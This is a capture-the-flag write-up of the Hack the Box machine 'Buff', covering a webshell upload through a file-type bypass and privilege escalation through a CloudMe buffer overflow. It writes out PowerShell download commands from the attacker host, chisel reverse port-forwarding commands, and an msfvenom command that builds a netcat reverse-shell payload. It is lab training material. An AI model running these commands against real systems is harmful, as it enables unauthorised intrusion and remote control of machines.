Hack the Box: Buff
Buff was an easy machine on Hack the Box. Here’s my take on solving the challenge

TL;DR: There’s a Gym Management Software running on HTTP port 8080. It’s vulnerable to a unauthenticated PHP file upload and therefore RCE. Locally there’s a CloudMy version running with known buffer overflowe vulnerability which can be exploited to escalate privileges.
Recon
Nmap scan shown only port 8080 open with HTTP server:

Main page:

Contact.php reveals an underlying system:

User
There’s a CVE for Gym management Software 1.0. It exploits a possibility to bypass file type filter by setting proper magic bytes and content type to upload a webshell:
Running the script will create a webshell:

The webshell can be used to get user flag:

Privlege escalation
There’s an interesting port open on localhost:

There’s also a CloudMe process running :
# tasklist
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 140 K
-- snip --
CloudMe.exe 6640 0 37,704 K
-- snip --
Shauns downloads reveal program version:

There’s a CVE with a buffer overflow for this version. It’s listening on the local port 8888, so I need chisel to forward it. Needed files can be downloaded by HTTP from my Kali using powershell:
# powershell -nop -c “Invoke-WebRequest -Uri http://10.10.14.20/nc.exe -OutFile C:\xampp\htdocs\gym\upload\nc.exe -Verbose”# powershell -nop -command “iwr “http://10.10.14.20/chisel.exe" -Outfile “C:\xampp\htdocs\gym\upload\chisel.exe””
To get Chisel to work I need to run a server on Kali:
./chisel_1.6.0_linux_386 server -p 4445 -reverse
And the client on victim:
chisel.exe client 10.10.14.20:4445 R:8888:127.0.0.1:8888
I also need to generate a binary payload to run downloaded netcat and return a reverse shell:
msfvenom -a x86 -p windows/exec CMD=’C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.20 443 -e cmd.exe’ -b ‘\x00\x0a\x0d’ -f python
Generated payload must be pasted to the exploit script:
Now running the script should return an admin reverse shell:
